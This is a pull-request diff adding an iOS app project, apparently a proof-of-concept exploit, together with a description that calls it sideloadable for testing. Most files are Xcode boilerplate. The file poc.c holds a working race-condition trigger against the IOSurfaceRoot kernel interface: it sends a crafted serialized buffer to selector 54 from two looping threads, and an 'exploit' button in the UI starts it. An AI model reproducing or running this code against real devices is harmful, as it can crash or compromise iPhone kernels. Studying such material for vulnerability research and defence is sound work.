+#pragma mark - UISceneSession lifecycle
+
+
+- (UISceneConfiguration *)application:(UIApplication *)application configurationForConnectingSceneSession:(UISceneSession *)connectingSceneSession options:(UISceneConnectionOptions *)options {
+    // Called when a new scene session is being created.
+    // Use this method to select a configuration to create the new scene with.
+    return [[UISceneConfiguration alloc] initWithName:@"Default Configuration" sessionRole:connectingSceneSession.role];
+}
+
+
+- (void)application:(UIApplication *)application didDiscardSceneSessions:(NSSet<UISceneSession *> *)sceneSessions {
+    // Called when the user discards a scene session.
+    // If any sessions were discarded while the application was not running, this will be called shortly after application:didFinishLaunchingWithOptions.
+    // Use this method to release any resources that were specific to the discarded scenes, as they will not return.
+}
+
+
+@end

--- a/explt/Assets.xcassets/AccentColor.colorset/Contents.json
+++ b/explt/Assets.xcassets/AccentColor.colorset/Contents.json
@@ -1,0 +1,11 @@
+{
+  "colors" : [
+    {
+      "idiom" : "universal"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

--- a/explt/Assets.xcassets/AppIcon.appiconset/Contents.json
+++ b/explt/Assets.xcassets/AppIcon.appiconset/Contents.json
@@ -1,0 +1,35 @@
+{
+  "images" : [
+    {
+      "idiom" : "universal",
+      "platform" : "ios",
+      "size" : "1024x1024"
+    },
+    {
+      "appearances" : [
+        {
+          "appearance" : "luminosity",
+          "value" : "dark"
+        }
+      ],
+      "idiom" : "universal",
+      "platform" : "ios",
+      "size" : "1024x1024"
+    },
+    {
+      "appearances" : [
+        {
+          "appearance" : "luminosity",
+          "value" : "tinted"
+        }
+      ],
+      "idiom" : "universal",
+      "platform" : "ios",
+      "size" : "1024x1024"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

--- a/explt/Assets.xcassets/Contents.json
+++ b/explt/Assets.xcassets/Contents.json
@@ -1,0 +1,6 @@
+{
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

--- a/explt/Base.lproj/LaunchScreen.storyboard
+++ b/explt/Base.lproj/LaunchScreen.storyboard
@@ -1,0 +1,25 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="13122.16" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" launchScreen="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="01J-lp-oVM">
+    <dependencies>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="13104.12"/>
+        <capability name="Safe area layout guides" minToolsVersion="9.0"/>
+        <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
+    </dependencies>
+    <scenes>
+        <!--View Controller-->
+        <scene sceneID="EHf-IW-A2E">
+            <objects>
+                <viewController id="01J-lp-oVM" sceneMemberID="viewController">
+                    <view key="view" contentMode="scaleToFill" id="Ze5-6b-2t3">
+                        <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
+                        <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
+                        <color key="backgroundColor" xcode11CocoaTouchSystemColor="systemBackgroundColor" cocoaTouchSystemColor="whiteColor"/>
+                        <viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
+                    </view>
+                </viewController>
+                <placeholder placeholderIdentifier="IBFirstResponder" id="iYj-Kq-Ea1" userLabel="First Responder" sceneMemberID="firstResponder"/>
+            </objects>
+            <point key="canvasLocation" x="53" y="375"/>
+        </scene>
+    </scenes>
+</document>

--- a/explt/Base.lproj/Main.storyboard
+++ b/explt/Base.lproj/Main.storyboard
@@ -1,0 +1,51 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="23504" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES" initialViewController="BYZ-38-t0r">
+    <device id="retina6_12" orientation="portrait" appearance="light"/>
+    <dependencies>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="23506"/>
+        <capability name="Safe area layout guides" minToolsVersion="9.0"/>
+        <capability name="System colors in document resources" minToolsVersion="11.0"/>
+        <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
+    </dependencies>
+    <scenes>
+        <!--View Controller-->
+        <scene sceneID="tne-QT-ifu">
+            <objects>
+                <viewController id="BYZ-38-t0r" customClass="ViewController" sceneMemberID="viewController">
+                    <view key="view" contentMode="scaleToFill" id="8bC-Xf-vdC">
+                        <rect key="frame" x="0.0" y="0.0" width="393" height="852"/>
+                        <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
+                        <subviews>
+                            <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="C8d-Ae-0yc">
+                                <rect key="frame" x="118" y="398" width="156" height="57"/>
+                                <constraints>
+                                    <constraint firstAttribute="width" constant="2000" id="lsD-cy-JIp"/>
+                                </constraints>
+                                <state key="normal" title="Button"/>
+                                <buttonConfiguration key="configuration" style="filled" title="exploit"/>
+                                <connections>
+                                    <action selector="exploit:" destination="BYZ-38-t0r" eventType="touchUpInside" id="SwI-rs-Ruj"/>
+                                </connections>
+                            </button>
+                        </subviews>
+                        <viewLayoutGuide key="safeArea" id="6Tk-OE-BBY"/>
+                        <color key="backgroundColor" systemColor="systemBackgroundColor"/>
+                        <constraints>
+                            <constraint firstItem="C8d-Ae-0yc" firstAttribute="leading" secondItem="6Tk-OE-BBY" secondAttribute="leading" constant="118" id="2dY-Ep-xR2"/>
+                            <constraint firstItem="C8d-Ae-0yc" firstAttribute="top" secondItem="6Tk-OE-BBY" secondAttribute="top" constant="339" id="5T5-OZ-gYs"/>
+                            <constraint firstItem="6Tk-OE-BBY" firstAttribute="bottom" secondItem="C8d-Ae-0yc" secondAttribute="bottom" constant="363" id="PQf-Ej-qRv"/>
+                            <constraint firstItem="6Tk-OE-BBY" firstAttribute="trailing" secondItem="C8d-Ae-0yc" secondAttribute="trailing" constant="119" id="bft-6G-AYk"/>
+                        </constraints>
+                    </view>
+                </viewController>
+                <placeholder placeholderIdentifier="IBFirstResponder" id="dkx-z0-nzr" sceneMemberID="firstResponder"/>
+            </objects>
+            <point key="canvasLocation" x="20.610687022900763" y="3.5211267605633805"/>
+        </scene>
+    </scenes>
+    <resources>
+        <systemColor name="systemBackgroundColor">
+            <color white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+        </systemColor>
+    </resources>
+</document>

--- a/explt/Info.plist
+++ b/explt/Info.plist
@@ -1,0 +1,25 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>UIApplicationSceneManifest</key>
+	<dict>
+		<key>UIApplicationSupportsMultipleScenes</key>
+		<false/>
+		<key>UISceneConfigurations</key>
+		<dict>
+			<key>UIWindowSceneSessionRoleApplication</key>
+			<array>
+				<dict>
+					<key>UISceneConfigurationName</key>
+					<string>Default Configuration</string>
+					<key>UISceneDelegateClassName</key>
+					<string>SceneDelegate</string>
+					<key>UISceneStoryboardFile</key>
+					<string>Main</string>
+				</dict>
+			</array>
+		</dict>
+	</dict>
+</dict>
+</plist>

--- a/explt/SceneDelegate.h
+++ b/explt/SceneDelegate.h
@@ -1,0 +1,15 @@
+//
+//  SceneDelegate.h
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import <UIKit/UIKit.h>
+
+@interface SceneDelegate : UIResponder <UIWindowSceneDelegate>
+
+@property (strong, nonatomic) UIWindow * window;
+
+@end
+

--- a/explt/SceneDelegate.m
+++ b/explt/SceneDelegate.m
@@ -1,0 +1,57 @@
+//
+//  SceneDelegate.m
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import "SceneDelegate.h"
+
+@interface SceneDelegate ()
+
+@end
+
+@implementation SceneDelegate
+
+
+- (void)scene:(UIScene *)scene willConnectToSession:(UISceneSession *)session options:(UISceneConnectionOptions *)connectionOptions {
+    // Use this method to optionally configure and attach the UIWindow `window` to the provided UIWindowScene `scene`.
+    // If using a storyboard, the `window` property will automatically be initialized and attached to the scene.
+    // This delegate does not imply the connecting scene or session are new (see `application:configurationForConnectingSceneSession` instead).
+}
+
+
+- (void)sceneDidDisconnect:(UIScene *)scene {
+    // Called as the scene is being released by the system.
+    // This occurs shortly after the scene enters the background, or when its session is discarded.
+    // Release any resources associated with this scene that can be re-created the next time the scene connects.
+    // The scene may re-connect later, as its session was not necessarily discarded (see `application:didDiscardSceneSessions` instead).
+}
+
+
+- (void)sceneDidBecomeActive:(UIScene *)scene {
+    // Called when the scene has moved from an inactive state to an active state.
+    // Use this method to restart any tasks that were paused (or not yet started) when the scene was inactive.
+}
+
+
+- (void)sceneWillResignActive:(UIScene *)scene {
+    // Called when the scene will move from an active state to an inactive state.
+    // This may occur due to temporary interruptions (ex. an incoming phone call).
+}
+
+
+- (void)sceneWillEnterForeground:(UIScene *)scene {
+    // Called as the scene transitions from the background to the foreground.
+    // Use this method to undo the changes made on entering the background.
+}
+
+
+- (void)sceneDidEnterBackground:(UIScene *)scene {
+    // Called as the scene transitions from the foreground to the background.
+    // Use this method to save data, release shared resources, and store enough scene-specific state information
+    // to restore the scene back to its current state.
+}
+
+
+@end

--- a/explt/ViewController.h
+++ b/explt/ViewController.h
@@ -1,0 +1,14 @@
+//
+//  ViewController.h
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import <UIKit/UIKit.h>
+
+@interface ViewController : UIViewController
+
+
+@end
+

--- a/explt/ViewController.m
+++ b/explt/ViewController.m
@@ -1,0 +1,27 @@
+//
+//  ViewController.m
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import "ViewController.h"
+#import "poc.h"
+
+@interface ViewController ()
+
+@end
+
+@implementation ViewController
+
+- (IBAction)exploit:(id)sender {
+    run();
+}
+
+- (void)viewDidLoad {
+    [super viewDidLoad];
+    // Do any additional setup after loading the view.
+}
+
+
+@end

--- a/explt/main.m
+++ b/explt/main.m
@@ -1,0 +1,18 @@
+//
+//  main.m
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#import <UIKit/UIKit.h>
+#import "AppDelegate.h"
+
+int main(int argc, char * argv[]) {
+    NSString * appDelegateClassName;
+    @autoreleasepool {
+        // Setup code that might create autoreleased objects goes here.
+        appDelegateClassName = NSStringFromClass([AppDelegate class]);
+    }
+    return UIApplicationMain(argc, argv, nil, appDelegateClassName);
+}

--- a/explt/poc.c
+++ b/explt/poc.c
@@ -1,0 +1,89 @@
+#include <stdio.h>
+#include <pthread.h>
+#include <IOKit/IOKitLib.h>
+#include "poc.h"
+
+
+
+io_connect_t glob_conn = 0;
+char *inStr = 0;
+size_t len = 0;
+
+
+void *race1() {
+
+if(!inStr || !len || !glob_conn) {
+printf("Malformed req!\n");
+return NULL;
+}
+
+while(1) {
+    IOConnectCallMethod(glob_conn,54,0,0,inStr,len,0,0,0,0);
+}
+
+return NULL;
+}
+
+void *race2() {
+
+if(!inStr || !len || !glob_conn) {
+printf("Malformed req!\n");
+return NULL;
+}
+
+while(1) {
+    IOConnectCallMethod(glob_conn,54,0,0,inStr,len,0,0,0,0);
+}
+
+return NULL;
+}
+
+
+
+
+
+int run() {
+    io_service_t surface = IOServiceGetMatchingService(kIOMainPortDefault, IOServiceMatching("IOSurfaceRoot"));
+    if(!surface) {
+    printf("IOKit obj doesn't exist???\n");
+    return 2;
+    }
+
+
+    io_connect_t conn;
+    kern_return_t kr = IOServiceOpen(surface,mach_task_self(),0,&conn);
+    if(kr != KERN_SUCCESS) {
+    printf("Failed to open userclient!\n");
+    return 3;
+    }
+
+    glob_conn = conn;
+
+    printf("Opened userclient!\n");
+    
+    
+    uint32_t dict[] = {
+        kOSSerializeBinarySignature,
+        kOSSerializeArray | kOSSerializeEndCollecton | 1,
+        kOSSerializeSymbol | 4 | kOSSerializeEndCollecton,
+        0x00414141
+    };
+    
+   
+    char *buf = malloc(sizeof(dict) + 12);
+    memcpy(buf+12, &dict, sizeof(dict));
+    inStr = buf;
+    len = sizeof(dict)+12;
+
+    pthread_t th1;
+    pthread_t th2;
+    pthread_create(&th1,0,race1,0);
+    pthread_create(&th2,0,race2,0);
+
+    pthread_join(th1,0);
+    pthread_join(th2,0);
+    
+    
+    return 0;
+    
+}

--- a/explt/poc.h
+++ b/explt/poc.h
@@ -1,0 +1,40 @@
+//
+//  poc.h
+//  explt
+//
+//  Created by SalupovTech on 30/11/2024.
+//
+
+#ifndef POC_H
+#define POC_H
+
+#include <stdio.h>
+#include <pthread.h>
+#include <IOKit/IOKitLib.h>
+
+enum
+{
+    kOSSerializeDictionary   = 0x01000000U,
+    kOSSerializeArray        = 0x02000000U,
+    kOSSerializeSet          = 0x03000000U,
+    kOSSerializeNumber       = 0x04000000U,
+    kOSSerializeSymbol       = 0x08000000U,
+    kOSSerializeString       = 0x09000000U,
+    kOSSerializeData         = 0x0a000000U,
+    kOSSerializeBoolean      = 0x0b000000U,
+    kOSSerializeObject       = 0x0c000000U,
+    kOSSerializeTypeMask     = 0x7F000000U,
+    kOSSerializeDataMask     = 0x00FFFFFFU,
+    kOSSerializeEndCollecton = 0x80000000U,
+    kOSSerializeBinarySignature = 0x000000d3,
+};
+
+extern io_connect_t glob_conn;
+extern char *inStr;
+extern size_t len;
+
+void *race1();
+void *race2();
+int run();
+
+#endif // POC_H

--- a/exportOptions.plist
+++ b/exportOptions.plist
@@ -1,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+</dict>
+</plist>


### PR DESCRIPTION
> **NOTE:**  
> While I have not yet tested this application, I am submitting this pull request to provide the base files. I will be testing it once i have implemented a useful UI that will display logs from the PoC

## TODO  
Currently, the UI is non-existent, but I plan to implement the following features in the coming days to weeks:  
- A button to initiate the Proof of Concept test  
- A textarea to display logs printed by `printf`

## New Features  
Thanks to [slds1](https://github.com/slds1/explt), the Proof of Concept has been turned into a fully functioning application that can be sideloaded onto an iPhone and used for testing. In addition to including the Xcode project for the application, I have also added the following:  
- A Makefile, which is used by the GitHub Workflow during the build process  
- A GitHub Workflow file, enabling non-Mac devices to build the Xcode project  
  - This also provides the ability to obtain the compiled IPA file for sideloading.